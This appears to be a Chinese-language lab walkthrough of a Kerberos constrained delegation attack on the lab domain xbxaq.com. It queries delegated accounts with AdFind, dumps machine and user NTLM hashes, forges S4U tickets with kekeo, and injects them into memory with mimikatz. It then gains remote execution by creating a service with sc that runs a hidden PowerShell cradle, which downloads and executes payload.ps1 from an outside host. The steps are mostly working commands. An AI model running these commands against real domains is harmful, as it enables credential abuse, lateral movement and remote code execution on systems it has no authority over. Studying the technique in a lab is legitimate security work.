34约束性委派攻击-实验

## 机器账户上线域内机器

> 前提条件

- 机器用户的hash值
- 机器用户设置委派的机器与服务

1、查询设置委派的机器用户

```
AdFind.exe -b "DC=xbxaq,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto
```

![](https://oss.maolin101.com/202501061842710.png-101.webp)

2、在机器用户上面直接查询hash值，（需要提权）

![](https://oss.maolin101.com/202501061842711.png-101.webp)

cs中的提权脚本地址：https://github.com/rsmudge/ElevateKit

![](https://oss.maolin101.com/202501061842712.png-101.webp)

提权成功

![](https://oss.maolin101.com/202501061842713.png-101.webp)

3、继续获取机器用户的hash值

![](https://oss.maolin101.com/202501061842714.png-101.webp)

```
10b9db776c68b68139ad65e5ae04069d
```

4、使用kekeo.exe工具申请TGT票据

```
shell kekeo.exe "tgt::ask /user:LM$ /domain:xbxaq.com /NTLM:10b9db776c68b68139ad65e5ae04069d" "exit"
```

![](https://oss.maolin101.com/202501061842715.png-101.webp)

5、申请ST1票据

```
shell kekeo.exe "tgs::s4u /tgt:TGT_LM$@XBXAQ.COM_krbtgt~xbxaq.com@XBXAQ.COM.kirbi /user:Administrator@xbxaq.com /service:HOST/ph.xbxaq.com" "exit"
```

![](https://oss.maolin101.com/202501061842716.png-101.webp)

6、申请ST2票据，并注入内存中

```
shell mimikatz.exe "kerberos::ptt TGS_Administrator@xbxaq.com@XBXAQ.COM_HOST~ph.xbxaq.com@XBXAQ.COM.kirbi /ptt"  "exit"
```

![](https://oss.maolin101.com/202501061842717.png-101.webp)

![](https://oss.maolin101.com/202501061842718.png-101.webp)

7、通过sc服务上线

```
shell sc \\ph.xbxaq.com create test binpath= "cmd.exe /c powershell.exe -nop -w hidden -c \"IEX((new-object net.webclient).downloadstring('http://192.168.110.1:8000/payload.ps1'))\""

shell sc \\ph.xbxaq.com start test
```

![](https://oss.maolin101.com/202501061842719.png-101.webp)

## 服务账号上线域内机器

> 前提条件

- 域用户的hash值或密码
- 域用户设置委派的机器与服务

1、查询设置委派的服务账户

```
shell AdFind.exe -b "DC=xbxaq,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
```

![](https://oss.maolin101.com/202501061842720.png-101.webp)

2、获取lm用户的hash值

![](https://oss.maolin101.com/202501061842721.png-101.webp)

```
3ea43f5e0b23aca3eaa64f2ccc50bf2e
```

3、申请TGG票据

```
shell kekeo.exe "tgt::ask /user:lm /domain:xbxaq.com /NTLM:3ea43f5e0b23aca3eaa64f2ccc50bf2e" "exit"
```

![](https://oss.maolin101.com/202501061842722.png-101.webp)

4、申请ST1票据

```
shell kekeo.exe "tgs::s4u /tgt:TGT_lm@XBXAQ.COM_krbtgt~xbxaq.com@XBXAQ.COM.kirbi /user:administrator@xbxaq.com /service:HOST/ph.xbxaq.com" "exit"
```

![](https://oss.maolin101.com/202501061842723.png-101.webp)

5、申请ST2票据，并同时注入到内存中

```
shell mimikatz.exe "kerberos::ptt TGS_administrator@xbxaq.com@XBXAQ.COM_HOST~ph.xbxaq.com@XBXAQ.COM.kirbi /ptt"  "exit"
```

![](https://oss.maolin101.com/202501061842724.png-101.webp)

![](https://oss.maolin101.com/202501061842725.png-101.webp)

6、通过服务上线

```
shell sc \\ph.xbxaq.com create stt2 binpath= "cmd.exe /c powershell.exe -nop -w hidden -c \"IEX((new-object net.webclient).downloadstring('http://192.168.110.1:8000/payload.ps1'))\""

shell sc \\ph.xbxaq.com start stt2
```

![](https://oss.maolin101.com/202501061842726.png-101.webp)

![](https://oss.maolin101.com/202501061842727.png-101.webp)